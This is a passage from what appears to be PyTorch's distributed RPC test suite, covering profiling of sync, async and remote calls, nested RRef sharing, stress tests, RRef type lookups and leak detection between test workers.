self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with _profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with _profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_sparse_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [build_sparse_tensor(), build_sparse_tensor()]
ret = rpc.rpc_sync(
worker_name(dst_rank), my_container_sum, args=(a,)
)
self.assertEqual(ret, my_container_sum(a))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits
# context manager before the remote function has ran.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
def _nested_rpc(self, f, expected):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
f,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, expected)
@dist_init
def test_nested_rpc(self):
self._nested_rpc(nested_rpc, torch.ones(2, 2) + 1)
@dist_init
def test_nested_rpc_sparse(self):
self._nested_rpc(nested_rpc_sparse, build_sparse_tensor() * 2)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_sparse(self):
self._stress_test_rpc(heavy_rpc_sparse, repeat=20, args=(build_sparse_tensor(),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
def _builtin_remote_ret(self, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.to_here(), expected)
@dist_init
def test_builtin_remote_ret(self):
self._builtin_remote_ret(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@dist_init
def test_builtin_remote_ret_sparse(self):
self._builtin_remote_ret(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
def _builtin_remote_self(self, x, y, expected):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.local_value(), expected)
@dist_init
def test_builtin_remote_self(self):
self._builtin_remote_self(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@dist_init
def test_builtin_remote_self_sparse(self):
self._builtin_remote_self(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
def _test_multi_remote_call(self, fn, sparse, args_fn=lambda x, y: (), kwargs_fn=lambda x, y: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n, sparse),
kwargs=kwargs_fn(n, sparse),
)
)
expected.append(fn(*args_fn(n, sparse), **kwargs_fn(n, sparse)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
@staticmethod
def _multi_args_fn(n, sparse=False):
if sparse:
return (build_sparse_tensor(), build_sparse_tensor())
else:
return (torch.ones(n, n), torch.ones(n, n))
@dist_init
def test_multi_builtin_remote_ret(self):
self._test_multi_remote_call(
torch.add, False,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_multi_builtin_remote_ret_sparse(self):
self._test_multi_remote_call(
torch.add, True,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@staticmethod
def _multi_kwargs_fn(n, sparse=False):
if sparse:
return {
"a": build_sparse_tensor(),
"b": build_sparse_tensor(),
"c": build_sparse_tensor()
}
else:
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
@dist_init
def test_multi_py_udf_remote(self):
self._test_multi_remote_call(
my_function,
False,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_multi_py_udf_remote_sparse(self):
self._test_multi_remote_call(
my_function,
True,
kwargs_fn=RpcTest._multi_kwargs_fn
)
def _py_rref_args(self, a, b, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(a, b)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(x, y)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
@dist_init
def test_py_rref_args(self):
self._py_rref_args(
torch.ones(2, 2),
1,
torch.ones(2, 2),
2,
torch.ones(2, 2) * 2 + 3)
@dist_init
def test_py_rref_args_sparse(self):
self._py_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 4
)
def _py_rref_args_user_share(self, a, b, c, x, y, z, expected):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(x, y, z)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
@dist_init
def test_py_rref_args_user_share(self):
self._py_rref_args_user_share(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_py_rref_args_user_share_sparse(self):
self._py_rref_args_user_share(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
def _py_rpc_rref_args(self, a, b, c, x, y, z, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(x, y, z)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, expected)
@dist_init
def test_py_rpc_rref_args(self):
self._py_rpc_rref_args(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_py_rpc_rref_args_sparse(self):
self._py_rpc_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
def _nested_remote(self, f, expected):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), expected)
@dist_init
def test_nested_remote(self):
self._nested_remote(
nested_remote,
torch.ones(2, 2) + 3
)
@dist_init
def test_nested_remote_sparse(self):
self._nested_remote(
nested_remote_sparse,
build_sparse_tensor() + build_sparse_tensor()
)
def _nested_rref(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
@dist_init
def test_nested_rref(self):
self._nested_rref(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_nested_rref_sparse(self):
self._nested_rref(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
def _nested_rref_stress(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
@dist_init
def test_nested_rref_stress(self):
self._nested_rref_stress(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_nested_rref_stress_sparse(self):
self._nested_rref_stress(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
# Otherwise, some peer could exit early, leaving others to timeout
# errors or connection closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
# ensure that an error message is thrown if a user tries to call
# local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def _test_rref_type(self, blocking):
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with _profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with _profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
# 10 ms timeout
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
Tests that it is possible to call an instance method on a remote objet
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
